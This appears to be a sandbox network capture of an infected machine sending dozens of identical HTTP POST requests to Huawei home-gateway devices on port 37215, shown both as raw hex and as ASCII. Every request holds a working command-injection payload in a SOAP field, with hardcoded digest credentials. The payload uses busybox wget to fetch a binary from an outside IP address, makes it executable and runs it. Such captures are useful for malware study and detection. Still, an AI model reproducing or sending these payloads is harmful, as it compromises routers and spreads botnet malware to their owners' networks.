                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            770192.168.2.153822441.43.15.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739778996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            771192.168.2.155690041.105.72.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739824057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            772192.168.2.154164641.3.134.16537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739867926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            773192.168.2.154283841.187.217.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739870071 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            774192.168.2.154146241.161.179.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739872932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            775192.168.2.153533041.216.242.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739900112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            776192.168.2.154325641.179.84.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739917040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            777192.168.2.154109041.121.175.6037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739955902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            778192.168.2.154187441.17.121.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.739969969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            779192.168.2.153991241.141.244.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.740000963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
